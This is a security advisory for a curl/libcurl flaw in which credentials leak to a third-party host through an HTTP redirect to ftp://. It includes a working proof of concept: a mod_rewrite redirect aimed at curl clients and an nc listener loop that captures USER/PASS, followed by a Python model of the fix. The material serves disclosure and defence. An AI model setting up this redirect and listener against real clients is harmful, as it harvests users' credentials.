5.7 Medium (CVSS3)
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: REQUIRED
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: NONE
Availability Impact: NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N

3.5 Low (CVSS2)
Access Vector: NETWORK
Access Complexity: MEDIUM
Authentication: SINGLE
Confidentiality Impact: PARTIAL
Integrity Impact: NONE
Availability Impact: NONE
AV:N/AC:M/Au:S/C:P/I:N/A:N

EPSS: 0.001 Low
Percentile: 33.1%
curl/libcurl can be coaxed into leaking user credentials to a third-party host by issuing an HTTP redirect to an ftp:// URL.

Configure firstsite.tld to perform the redirect with mod_rewrite:

```
RewriteCond %{HTTP_USER_AGENT} "^curl/"
RewriteRule ^/redirectpoc ftp://secondsite.tld:9999 [R=301,L]
```

On secondsite.tld, run a minimal listener that answers the FTP login sequence, for example with:

```
while true; do echo -e "220 pocftp\n331 plz\n530 bye" | nc -v -l -p 9999; done
```

Then, from the client, run:

```
curl -L --user foo https://firstsite.tld/redirectpoc
```

The listener on secondsite.tld receives the credentials:

```
Listening on 0.0.0.0 9999
Connection received on somehost someport
USER foo
PASS secretpassword
```

There are several issues here:

- the credentials are sent to a different host (firstsite.tld vs secondsite.tld).

This is definitely not what the user could expect, considering the documentation says:

In addition, TLS SRP user credentials (CURLOPT_TLSAUTH_USERNAME and CURLOPT_TLSAUTH_PASSWORD) are also leaked on redirects.
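As an added illustration (not curl's code and not part of the original report), the following Python models the decision a client has to make on each redirect hop while it holds --user credentials. `permissive_policy` reproduces the behaviour the report describes: the credentials follow every redirect, including the hop to ftp:// on another host. `same_origin_policy` is an assumed hardened rule, re-sending credentials only when scheme, host and port match the original request. The redirect chains and the credential pair are constructed from the PoC above; the policy names and `simulate` helper are this example's own.

```python
"""Added example: modelling the redirect credential decision (not curl's code)."""
from urllib.parse import urlsplit

# Default ports per scheme, so "https://a.tld" and "https://a.tld:443" compare equal.
DEFAULT_PORTS = {"http": 80, "https": 443, "ftp": 21, "ftps": 990}


def origin(url):
    """Return (scheme, host, effective port); unknown schemes keep port None."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").lower()
    port = parts.port if parts.port is not None else DEFAULT_PORTS.get(scheme)
    return scheme, host, port


def permissive_policy(original_url, redirect_url):
    """Vulnerable behaviour described in the report: credentials follow every redirect."""
    return True


def same_origin_policy(original_url, redirect_url):
    """Assumed hardened rule: re-send only when scheme, host and port are unchanged."""
    return origin(original_url) == origin(redirect_url)


def simulate(start_url, redirects, credentials, policy, max_redirs=5):
    """Follow a redirect chain and record, per hop, (scheme, host, credentials sent).

    `redirects` maps a URL to the Location it redirects to. The redirect is still
    followed under every policy; only whether the credentials accompany the new
    request differs. The policy compares each target against the *original* URL.
    """
    hops = [(origin(start_url)[0], origin(start_url)[1], credentials)]
    current = start_url
    for _ in range(max_redirs):           # bound the walk so a cycle cannot loop forever
        if current not in redirects:
            break
        target = redirects[current]
        sent = credentials if policy(start_url, target) else None
        hops.append((origin(target)[0], origin(target)[1], sent))
        current = target
    return hops


# Constructed chain mirroring the report's PoC: HTTPS on firstsite.tld -> ftp:// on secondsite.tld.
POC_CHAIN = {"https://firstsite.tld/redirectpoc": "ftp://secondsite.tld:9999"}
# Constructed benign chain: a same-origin path change.
SAME_ORIGIN_CHAIN = {"https://firstsite.tld/a": "https://firstsite.tld/b"}
# Constructed credentials, taken from the report's curl invocation and listener output.
CREDS = ("foo", "secretpassword")

if __name__ == "__main__":
    for name, policy in (("permissive", permissive_policy), ("same-origin", same_origin_policy)):
        for scheme, host, sent in simulate("https://firstsite.tld/redirectpoc", POC_CHAIN, CREDS, policy):
            print(f"{name:12} {scheme}://{host:<16} credentials sent: {sent is not None}")
```

Under the permissive policy secondsite.tld receives `foo:secretpassword` exactly as the nc listener shows; under the same-origin policy the ftp:// hop is still followed but without credentials, while the same-origin chain keeps them. Independently of the credential decision, curl's own `--proto-redir` option (`CURLOPT_REDIR_PROTOCOLS` in libcurl), e.g. `--proto-redir =https`, restricts which protocols a redirect may switch to and would have refused the ftp:// hop in this PoC outright.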
Leak of confidential information (user credentials).